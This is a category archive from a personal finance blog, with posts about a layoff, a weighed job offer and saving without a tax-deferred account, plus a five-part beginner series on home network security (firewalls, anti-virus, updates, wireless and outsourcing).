Category Archives: Work

Investing without a tax-deferred account

My new job does not have a tax-deferred account option – other than an HSA.  I don’t believe we can even *have* an HSA until the end of the year.  We’re using Dad’s Health Care FSA (although, we can drop it when we update his coverages because our health insurance has changed – “qualifying event”).  The new company contributes $1500/year to an HSA (high deductible plan – hope I can use Dad’s high deductible plan, and their HSA – since I hopefully won’t be there long).  We may be able to contribute $6,550 to the HSA for the year (which I’m going to see if I can make happen almost all at once if we can contribute – might as well get in on the fun while I can).

I *was* going to max my 401(k) contributions starting in August, but well, that plan is shot at the moment.  So, the best I can do is the HSA (if I can contribute), and try to get a deduction for a traditional IRA contribution – not sure if I can because I was covered under a plan for part of the year.  And then sock away a lot into a taxable account.  I *think* we’ll be able to contribute to a Roth, but our taxes will be *super* high this year without me being able to shelter some (at least 6k extra), so it probably doesn’t make sense.

I am getting ~$8,800 in accrued paid time off – no idea when that’s coming through or in what form (will taxes be taken out of it? will it be as part of payroll from the new company?).  It will be a nice pad to our emergency fund – which I had just almost drained to pay off my loans (talk about bad timing).

We’re moving into “save a lot” mode where we’re going to try to save 90% of my net salary, or about 35% of our total gross (we still have to pay daycare if I work, so we can’t do 100% of mine).  That extra money will be invested in a taxable account.  I’ve so far only been investing in ETFs in my taxable account – in about a month, I should have enough to switch those over to mutual funds.

We’re going to use Dad’s health insurance, because it’s too annoying to switch again, and at the moment, his job is more stable.  I’m hoping to find a new position in the next month.  I already had to cancel my annual exam (originally scheduled for 6/2 and way overdue – should have been in April) because I had no clue what my insurance status would be. I just need to get the paperwork from our HR that says I was “laid off” to give to Dad’s company to start under their plan next week.  From what I can tell, their prices are about the same as Dad’s.

Does anyone else have to deal without a tax-deferred savings?  I’m already looking for another job, but aside from that, how do you deal with investing for retirement?

Accepted the Offer

I verbally accepted the offer with one condition – they have to have some kind of tax-deferred retirement account available by the end of the year.  I ran some numbers, and if we can’t sock away my contribution tax-deferred, we’ll owe about $6000 more in taxes per year (and without being able to lower my taxable income, I can’t deduct any amount contributed to an IRA because Dad has a 403(b)).  Those extra taxes combined with the piss poor salary offer and benefits basically causes me to lose almost 30k/year in compensation – from what I’m making now – which is well below what I should be making.

I haven’t signed any paperwork, so I have no idea if I technically have a job on Monday. I’m at home today (taking as much of my personal leave as I can before it disappears – except I’ve pretty much spent all day dealing with this crap…)

I will however be actively looking for another position which pays better/has better benefits.  Won’t hurt to have *some* money coming in while I look….  And if your company is looking for a CISO or CISO type position, let me know via e-mail (mom at mydomain) 🙂

Update 30-May 5:30pm: my boss is making up the PTO issue – we’ll be paid out what PTO we had accrued – I had 5 weeks, so I’m getting a bit more than a month’s extra money out of it – a nice start to our long term emergency fund.

And the Hammer Falls…

Well,  It looks like as of Monday, I might well be out of a job.  I *think* I qualify for unemployment since technically the company is closing and I’m being “laid off”.  I’ve been offered employment from the company that is “buying” my company, but it doesn’t look very attractive (no retirement plan at all!).   I need to talk to someone who is familiar with unemployment law to check on that (murky details, so I’m not sure that it’s cut and dry).

I’ve not met the people I’d be working for – although I’d directly be working for my current boss.  According to him, other than pay, benefits, etc, the work we do won’t change, the clients won’t really change, etc.  I’m leaning towards giving it a try – maybe.  I’m meeting with the “new” owners this afternoon.  There is a serious non-compete (“Company loyalty”) clause where I can’t hold down any other work while working for them, and anything I come up with while working for them (even on my own time) belongs to them – puts a serious dent in Dad’s and my plan to write our own software.  I don’t know how negotiable it is – I can declare previous invention, and since we’ve had this idea percolating in the backs of our minds for a while, I can declare it.  I *think* I have to declare this blog, although I make no money off of it (haven’t in over a year), it might turn into something though – and it is prior invention.

Because I’ve been working so hard the last three weeks, my brain is a bit fried – I lean towards giving them the finger and hoping we can make it (I need to make my decision by tomorrow, no idea what time tomorrow though).  I need to run some numbers to see if we really can do it, and where we can cut back.  I know we can do it if we take Daughter Person out of daycare, but I mentally can’t handle that, so we’d probably do a day or two a week at least – or maybe talk Grammy into staying for a while.

At least I don’t have student loans to worry about!  And thanks to YNAB, we have June fully covered as far as income.

Busy, Busy, Busy

Work has picked up this month, and I’m traveling during 3 weeks this month – including to Brazil at the end of the month.  The traveling is fun to a certain extent, but in addition to the actual travel to the sites I’m visiting, I have to spend approximately 40 hours writing a report once I’ve finished my site visit.  If you do the math, you’ll notice that there are not more than 40 hours in a work week – leaving me finishing my reports after hours.   I’m particularly keen on finishing the reports before I do the next site visit, just so I don’t get multiple sites mixed up in my head!

The travel normally isn’t too bad, but this past week, I got caught up in the delays caused by a fire at air traffic control in Chicago.  My flight (no where near Chicago) was delayed over 4 hours!  At least we managed to get to our destination, which is more than I can say for some other travelers that day.  I actually was so exhausted when I finally made it to my hotel that I ordered room service.  I think I can count on one hand how many times I’ve ordered room service.  I can expense it, but I still have a deep-seated desire to not waste money, even if it’s not mine. (I’ve actually got a bit of a reputation at my client for being the “cheap one”).

I hope to catch up on everyone’s posts as I procrastinate report writing, but I do want to spend some time with my family while I’m not traveling!

If/Then in New York City

I just spent the last few days in New York City for work, and I took advantage of the trip to see a Broadway show. I’m a huge fan of Idina Menzel, and so I looked up tickets for “If/Then”, her new musical. Dad graciously used his fun money to buy my ticket because I wasn’t going to spend “that much” money on one ticket ($101.25). Go see it if you get the chance, but take tissues!

The show is all about the choices we make and what those consequences can be, and the missed opportunities we’d have or not have based on those choices. The show starts with Elizabeth (Idina Menzel) making a choice in a park in New York City. Then the rest of the show follows the two paths that “happened” after that first choice. You follow the two paths “Liz” and “Beth” through the show, including work, love, heartbreak and friendship. I admit I bawled during the 2nd half after intermission. The central theme of the show is all about making our choices and owning them, and not constantly wondering what if.

The central theme applies to our lives as well. We made choices to get to where we are today, whether we’re happy about that or not. And we can’t keep wondering what if we had made a different choice. We have to own our choices, good and bad, and live with them. Once those choices are made, we can’t undo them, and we shouldn’t even try, but instead make our next choice to the best of our ability.

When it comes to our financial lives, most of us probably wish we made different choices in the past – living more within our means, saving more, borrowing less. But we are where we are now, and the best we can do is make the best choices we can from this moment on. So, if you borrowed money in the past – even just moments ago – start making the choices you want to make right now.

No one knows what the future holds (or we’d all be lottery winners!), so you do what you think is best at the time given what you *do* know. Don’t waste time wondering what would have happened if you had made a different choice, you didn’t – so own your choice, and make a better choice next time.

Home Network Security Part 5 – Outsourcing

Many folks reading this “outsource” some of their computing power or storage to 3rd parties.  If you pay for hosting, or backup to a backup service, you’re “outsourcing”.  You’re also trusting this third party to take care of your data.  Have you looked at the security policies or audits of the companies you are working with?  It’s not easy, and at some point, you just have to pick a company to work with and hope they’re doing things “right”.

What Can You Do?

All data centers, and some hosting companies go through an audit called an SSAE16 (previously SAS70 type 2).  There are three parts to the SSAE16, and the technical security information is located in the SOC 2 report – sometimes shortened to SSAE16 type II.  SOC 1 is financial information, and SOC 3 is too generic to be of much use (and many companies don’t bother) – it’s just a statement that they have been audited.  Getting your hands on the SSAE16 SOC2 is almost impossible though – you’ll likely have to sign an NDA to read it, and even if you do read it, you might not understand it.  It’s a list of the controls a company has that protect the confidentiality, availability and integrity of the data they have.  Those controls are tested by auditors (usually over a period of 6 months), and the auditors make sure that the controls are adequate and operational (aka, they’re working like they’re meant to).

If you can find out if a company has an SSAE16 SOC 2, just the fact that they have one is a pretty good indicator that they’ve got their ducks in a row from a security perspective.  After all, why would you pay to go through the audit (several hundreds of thousands of dollars) and not reasonably expect to pass?  Also, the SOC 2 is meant to be shared with customer auditors and no company would want to share it if it was bad.

Companies (usually not US based ones) can also be certified against ISO 27001, which is the international security standard.  I personally think that an ISO27001 certification is a better indicator of security than an SSAE16 because ISO27001 dictates specific controls that must be in place.

Review Security Policies

Many companies make a generic version of their security policies available on their web page (or perhaps with an NDA).  Take a look at it and consider how reasonable it is, or compare it to what you do at home (or work).  Just having a security policy isn’t sufficient – make sure it covers the topics you’re concerned about.

How to Interpret What You Find

Does the company encrypt your data?  Who has control of the encryption keys?  You?  Them? Are you worried about your data being read – or given to a government in response to a subpoena?  Consider what you are worried about and see if you can find information about what the company does about it on their web page.  It also never hurts to e-mail them and ask – try the general sales e-mail first, they can usually answer your questions.

Popular Companies’ Security Information

Are there any other companies you use that you need help finding their security information?  I can help in a limited capacity via the comments (ie. pass on what’s publicly available).  If you’re really concerned about outsourcing and want more in-depth security information on your outsourcing company, contact me via e-mail mom at <my domain> and I can tell you about what my company does and how we might be able to help you

Other Posts in this Series

Home Network Security Part 4 – Wireless Networks

Wireless networks are great things – you can take your laptop pretty much anywhere in or around your house and still be connected to the Internet with no wires.  I remember when they were first beginning and a wireless card for your laptop cost almost $300, not to mention the cost of a wireless router.  CMU was one of the first schools to have a completely “wired” wireless campus – that meant that pretty much anywhere you were on campus, you could reach a wireless access point.  Wireless Andrew was my first experience with wireless networking, although I had heard of it previously.  And students could get a subsidized PCMCIA card for about $150.

Now, wireless networks are *everywhere*, and a lot cheaper.  Most cable modems or FIOS routers come with wireless enabled – and it’s a lot faster than it was.  When we first moved to our house, it took Verizon almost 3 weeks to get our FIOS installed (they had to increase the capacity at our neighborhood’s main connection point before they could connect us), but “helpful” neighbors had wide open access points, so we could still get on-line from home.  I’m not sure they ever knew we “borrowed” their connection for a while.

So what does this have to do with security?  A wireless access point that is incorrectly configured can be a legal liability for you, an access point into your network, as well as just plain annoying.  YOU are legally responsible for all Internet traffic that travels through your cable modem/FIOS router/phone line/whatever.  So, if someone decides to download/upload a pirated movie using your network, you are the one who will get the cease and desist order or court summons. You can fight it, but you still have to fight it in the first place.  If you don’t limit access to your wireless access point (router), someone sitting on the street could cause you a lot of headaches.

What is a correctly configured router?  One where you have a reasonable idea of who is connecting to your network and what they have access to – limiting access to authorized users.  The way most corporations do this is by requiring a corporate account or guest username/password (not network password) to access the wireless network.  If you’ve been in a hotel that you have to type your room number and last name into a web page before accessing the Internet, that’s what I’m talking about.  Most home routers do not have this capability.  If yours does, I suggest you look into using it.  A way that might look like a good idea is MAC address filtering.   It’s not a bad idea, but it won’t stop someone from connecting – it’s too easy to fake MAC addresses.  So don’t depend on it as the only mechanism.

The best method available to home users is to configure your network to use WPA2 with AES encryption, and a strong network key.  If you have older equipment (Nintendo DS…), it may not support WPA2, in which case, use WPA if you can, only using WEP as a very last resort.  WPA and WEP can both be broken in less than 3 hours (almost instantaneously for WEP).  It’s dependent on how much traffic goes across your network – but attackers can generate the traffic themselves.  WPA2 is a little harder, but not impossible to break.  Once an attacker has the network key, they can keep coming back to use your network for free.

If you’re router supports WPS (wi-fi protected setup), it’s a nice feature, but creates a vulnerability that someone can exploit to get access to your network more quickly.  Once you’ve setup your laptop/desktop – turn it off.

In addition to possibly opening you up to legal problems, someone able to access your wireless network can access systems on your home network, potentially compromising your confidentiality and integrity.  They can also affect your availability by using up all of your bandwidth.

For home users, this suggestion is not completely practical, but should definitely be implemented for small businesses.  Separate your wireless network from your “wired” or corporate network – by a firewall.  That means that folks on your wireless network (whether allowed or not) can only access the Internet.  Authorized users should use whatever your company’s remote access method is to access the internal network from the wireless network.  Home networks can implement this as well, but you’ll have to have some kind of remote access solution – like OpenVPN, or LogMeIn, etc.

Other Posts in this Series

Home Network Security Part 3 – Updates

You should always be automatically (or ASAP) updating all of the software on your system.  The operating system, your office suite, chat programs, your web browser.  If there’s an update for it, you should probably be applying it.  I’m not saying you necessarily need to upgrade your software, but you do need to keep it updated.

Updates and upgrades are small patches released by the vendor to fix something. They may fix one little thing, or they may fix a whole bunch of things and add features – it’s completely dependent on the vendor.

Security updates are to fix a known vulnerability and/or exploit.  Many times, in the description of the update you’ll see something like “fixes CVE-2013-3940” with a link to the vulnerability.  CVE is the common vulnerabilities and exposures database, which is also run by NIST as the National Vulnerability Database (NVD).  If you’re feeling technical, you can go read what the issue is, but it also gives an Impact of the vulnerability – which gives you an idea of how important it is to apply the update.  The higher the number, the faster you should apply the update!

If you do not apply the updates, your system is now vulnerable to a known attack, and many attacks have a corresponding exploit or Proof of Concept (PoC) code that is semi-public, so you can be sure that someone will be trying it out on random or targeted computers.  Just because you haven’t updated doesn’t mean that you will be attacked or that you will be compromised.  You have other protections in place to limit access to your system: like a firewall, or anti-virus.  It’s like playing Russian roulette with an old bulletproof vest.  Two things have to happen: you have to be attacked (the bullet in the correct chamber), and you have to be vulnerable (the vest might not work any more – or you might get hit outside the area protected by the vest).


For larger vendors (Microsoft), there is a distinction between a security update and a general update.  You should allow all security updates automatically.  Vendors have gotten really good at segregating the security fixes from new features, and so automatically updating security patches is not likely to affect you adversely.  General updates fix non-security issues or add new features.  For the most part, you’re not going to get any grief from automatically updating these, but from a security standpoint, you don’t need to automatically update the general updates.


Software manufacturers/developers stop supporting software at some point – the End of Life (EOL).  This means that no more patches will be available for it if a vulnerability is found.  If you’re still running Windows XP or Office 2003, you need to upgrade because Microsoft is killing support for it April 8, 2014.  And if you’re frugal, you might be running those old versions to save money – I know I’ve got XP in my Windows VM still.  Microsoft has a pretty long lifecycle for their products: over 10 years, but other developers don’t (Adobe is 5 years).  Some don’t even bother to tell you they’re not supporting a particular software version any longer.

What If I Don’t Want to Upgrade?

If you don’t want to or can’t upgrade to a supported version for some reason, you’ll want to make sure that you have a firewall that restricts all inbound traffic, an as up-to-date anti-virus as you can get, an up-to-date browser, and preferably a sandboxing tool like Google Chrome or sandboxie.  You will be vulnerable to exploits that have not been patched, but a firewall will help protect from network attacks, and anti-virus and sandboxing will help protect from “user error” attacks – ie. clicking on an e-mail attachment.

Additionally, if there’s no reason for this machine to be on your network (ex: it’s for CAD, or an off-line video game), consider just unplugging the network cable or disabling wireless.

Other Posts in this Series

Home Network Security Part 2 – Anti-Virus

Your systems should have anti-virus software installed – yes, even those of you with Macs. If you run Linux as a desktop, you get a pass, but I still recommend installing ClamAV or Sophos if you exchange files with Windows systems. You don’t want to unintentionally pass along a virus to your friends and family.

Sidenote: If you browse porn or other “questionable” sites, I’m not going to judge, but you need to be even more careful about having a good up-to-date anti-virus program (or 2 or 3).  And you should really consider sandboxing that activity – I use VMWare and snapshots when I need to visit questionable sites.

There are many anti-virus products available, and for the most part, they’re all good options. You want to look for a product that advertises “heuristics” – and almost all of them do. If you have more than 4-5 computers in your household (and a system you can install the centralized server on), you may want to consider splurging for the “endpoint protection” solutions which allow you to control the anti-virus software (and software firewall) from a centralized server – great for kids. But it’s not necessary at all.

One of my current favorites for Windows is Microsoft Security Essentials.  It’s free, rates very highly in the tests that are run by 3rd parties, and doesn’t completely bog down your system.

I use Sophos for Mac, (free) but I’ve also heard good things about Kaspersky (it’s also a firewall) and ESET, but I’ve not used either of them.

The most common vector of attack is through malware – viruses, trojans, key loggers, etc.  All an attacker has to do is get you to click on a web page or an e-mail attachment and they can infect your computer.  And you’re left cleaning up the mess.  The specific actions of the malware vary, but can cause your system to become part of a botnet, encrypt all of your important files, or give an attacker control of your system to read your files, send e-mail as you, etc.

Malware hits your confidentiality, integrity and availability, depending on the specific action, so it’s important to try to prevent it.

How to configure Anti-Virus

For the most part, the defaults for any anti-virus install are acceptable.  You want at a minimum:

  • Automatic signature updates
  • Heuristic detection enabled
  • On-access/on-read scanning

You also should consider the following settings, but there can be some drawbacks to them:

  • Automatic engine updates (not too many drawbacks, but does update the software automatically, some don’t want that)
  • On-write scanning (can slow down writes and disk performance)
  • Scanning networked drives (you may not want your system to be scanning a file server)
  • Scheduled scanning (a full scan of your system on a schedule.  This works better on a desktop, and while the scan is going on, it will generally bog down your system)

What if you do get infected?

If you do happen to be infected by malware, there are several things you can do.  One, get yourself a free anti-virus ASAP.  Run it, and it *may* be able to clean up your system.  If it can’t, it can at least tell you what file was infected, and you need to rebuild your system and restore from backup – without that file.  There are also IT shops which specialize in removing malware, and you can look into them, but it’s a long process and they likely charge more than you’re willing to pay, but it is an option.

How Anti-Virus Works (optional)

There are two methods of protecting a system from Viruses and Malware: signatures and heuristics.  In the past, Signatures were the only method available, but in the last 4-5 years, heuristics have become a significant research area and important protection.

Signatures are pieces of text, binary, code, memory, etc that indicate a specific virus exists.  For example, a virus adds a specific file to your file system, or changes a system file in a specific way.  For all known malware, your anti-virus should have a “signature” for it.  Although it may be a day or two from discovery to a signature update.  That’s great for known malware, but what about the new stuff that’s coming out almost every day?

This is where the heuristics comes in.  Your system operates in a certain way – “normal”.  Malware tends to do certain things that are outside of that normal: replicate itself, change system files, make network connections.  Anti-virus programs look for this type of behavior and takes steps to quarantine that code.  It’s generally done by running the code in a special “sandbox” where it can’t access your “real” system, and watching for system calls.  If it’s all clear, the anti-virus lets it continue to run on your system, and “remembers” what that clean code is and lets it run next time without sandboxing.  Some heuristic methods watch for abnormal network traffic or disk usage, but the specific method used is dependent on the software you bought, and how they conduct their research.  Heuristics aren’t perfect, but they’re considered “good enough” to help detect new malware that your software doesn’t have the signature for.

Other Posts in this Series

Home Network Security Part 1 – Firewalls

You need a firewall.  Yes, even you with only one computer at home. Yes, even you that works from a laptop at a coffee shop (especially you).

You don’t necessarily need a hardware firewall, which is what most people think of when I say “firewall”.  A software firewall is sufficient, and sometimes the best option.

There are several types of firewalls, the two I’m going to break down here are hardware and software.  You *always* want a firewall that claims SPI – Stateful Packet Inspection, or you’re going to have a lovely time figuring out which ports to open and close – luckily, all the newer ones I know of are stateful.

Firewalls prevent network connections from attackers, so they’re stopped “at the door” so to speak.  There are ways around firewalls, but a firewall will protect you from many of the random attacks that are continuously going on on the Internet.  They are one of the most basic, most available, and easiest to implement security protections you can have.

Hardware Firewalls

If you have more than one computer at home, a hardware firewall is ideal.  One point protects most of your systems.  If you have cable or FIOS high speed Internet access, you probably already have one (and it’s likely enabled) as part of your cable modem or FIOS router.  If you have a wireless router, it’s a good chance that you’ve got a hardware firewall.  If you don’t have one, or aren’t sure, the Cisco/Linksys WRT54G* series of home routers is pretty decent, and the ones I’ve had in the past have been solid – that doesn’t mean the current crop is as good, each manufacturer has had their issues.  Other brands to check out are: Dlink and Netgear.  I’m not a big fan of D-link, and that model might have a backdoor in it, but not confirmed and it’s cheap.  Pretty much any “router” you buy should claim that they have a “SPI” firewall, and you’re good to go, pick whichever manufacturer, and “other” features you like.

These “home” firewalls are not as powerful or configurable as an enterprise/business firewall, but they’re “good enough” for home users.  One of the biggest differences between a home firewall and an enterprise firewall is the lack of an Intrusion Detection System (IDS).  This isn’t a huge deal for home users, but if you want an IDS on your firewall, most providers sell small business firewalls that have that capability (although none of them have good ratings on Amazon).  You can also put your own IDS on your network.  Snort is (was?) the best free one, but the company supporting it was just acquired by Cisco, and no one knows how well that will go over yet.

Hardware firewalls build a virtual “wall” around your network to help prevent attacks.  Given the number of casual attacks that go across networks every day, a hardware firewall can also lighten the CPU/memory load on the systems inside that wall.

Even if you have a hardware firewall, you want to have a software firewall enabled for all of your “portable” devices – laptops that will leave your network, etc.

Software Firewalls

Windows and Macs have come with built-in software firewalls for several years.  This must be enabled on a laptop or machine that travels outside of your network.  It’s an added bonus to desktop systems, but not required.  The Windows firewall can be enabled by going to Control Panel then Security.  The “Windows Firewall” should be turned on.  On a Mac, go to System Preferences, Security & Privacy, and under Firewall, it should be turned on.

Almost all anti-virus software also offers a “personal firewall” as well, so you can opt for one of those.  They tend to work on the ports and protocols method, and some people prefer that.

Software firewalls only protect the one computer that it is enabled on, and there are actually *many* holes in software firewalls by default to support operating system services (network drive sharing, etc).  It’s a balance between usability and security, and the vendors tend towards usability in home systems.

Where hardware firewalls almost always work on the concepts of “ports and protocols”, software firewalls generally work at the application level – allowing specific processes or applications access, and blocking others.

Firewall Settings

Log into your firewall/router via the web page and pay attention to what your firewall settings say – print the screen, write them down, etc. Become familiar with them, find a manual for your router/firewall and twiddle with settings (and know how to hard reset the device!).

Most home users are going to want to completely block all incoming traffic at a hardware firewall and some software firewalls.  But won’t it keep things from working?  It shouldn’t.  This is where the Stateful Packet Inspection part comes in.  Something inside the wall initiates a connection to the outside.  The firewall allows back in all related traffic – responses from web pages, game servers, Netflix, etc.

There are some things that home users use which may require ports/protocols to be open from the outside. All home routers will have NAT (Network Address Translation) enabled – it’s sort of a firewall by itself, but not sufficient.  You’ll find some settings related to port forwarding if you need to open up any ports/protocols in your firewall.  Common situations that may require you to have ports open: VoIP service (although most have fixed this routing issue), remote control software (like Hamachi), and provider management control – your cable company or phone company may have remote control access to phones/routers/etc.  Personally, I close off access to anyone but me, but you’re taking the chance that your cable/phone company may not be able to help you remotely if you have problems.  Generally, I suggest closing everything off, then testing various items – call your VoIP number from your cell – does the call go through?  If not, you may need to open specific ports.

If you’re comfortable with networking concepts, I suggest blocking outgoing ports you know aren’t used as well.  This helps prevent attackers from using your network to attack others, and helps prevent what I call “callback” attacks, where the attacker has the target send traffic back to them over an open outgoing port.  This steps over the security vs. useability line, so take this advice with caution.

With a software firewall, I also suggest blocking all incoming traffic, but with Windows, there are a lot of applications that can access the machine by default.  Microsoft has a decent write-up of the settings options for Windows, and Apple has a corresponding document for Macs. Yes, it applies to Lion, Mountain Lion and Mavericks.  One setting I would caution you *not* to apply on the Mac firewall is logging – it will completely bog down your system, and if you’re not looking at the logs, why turn them on?

How Firewalls Work (optional reading)

Firewalls work on the concepts of ports and protocols or the newer software ones work based on applications.  A network connection is defined by two endpoints, each endpoint has an IP address, and a port.  The connection itself has a protocol.  That’s 5 pieces of information you can use to restrict access to your network.  Generally, home users do not worry about IP addresses, but they do worry about ports and the protocol.  Protocol is usually either TCP or UDP, although others exist, and port is a number from 1 to 65535 – although there are “well-known” ports that various services use.  Don’t bother remembering them unless you’re interested, you can always look them up 🙂  Most firewalls do this by creating “rules” that have at least one of the 5 pieces of information – with the assumption that the undefined pieces mean “all”.

Most (newer) software firewalls work on the concept of applications.  An application asks the firewall for permission to listen from the outside, and the user says “yes” this application can or “no” it can’t.  If the user says “yes”, the firewall allows any network connection to or from that application that the application requests – no matter what the port or protocol is.  This is more user-friendly, but can open a lot of holes that the user is unaware of – but you can bet attackers are.

Disclaimer, any links to products are affiliate links through Amazon.

Other Posts in this Series